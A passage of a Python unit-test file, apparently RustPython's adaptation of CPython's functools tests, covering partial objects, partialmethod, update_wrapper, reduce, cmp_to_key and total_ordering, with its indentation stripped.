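# classes below can exercise both variants.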
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
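# Illustrative example (not part of the original file):
#   p = functools.partial(max, 1, key=abs)
#   signature(p) == (max, (1,), {'key': abs}, {})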
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, thread 'main' has overflowed its stack on Windows")
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pickle(self):
super().test_pickle()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_recursive_pickle(self):
super().test_recursive_pickle()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# TODO: RUSTPYTHON
def test_pickle(self):
TestPartial.test_pickle(self)
# TODO: RUSTPYTHON
def test_recursive_pickle(self):
TestPartial.test_recursive_pickle(self)
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertWarns(DeprecationWarning):
class B:
method = functools.partialmethod(func=capture, a=1)
b = B()
self.assertEqual(b.method(2, x=3), ((b, 2), {'a': 1, 'x': 3}))
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bad_cmp(self):
super().test_bad_cmp()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cmp_to_key(self):
super().test_cmp_to_key()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cmp_to_key_arguments(self):
super().test_cmp_to_key_arguments()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_hash(self):
super().test_hash()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_obj_field(self):
super().test_obj_field()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_sort_int(self):
super().test_sort_int()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_sort_int_str(self):
super().test_sort_int_str()
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
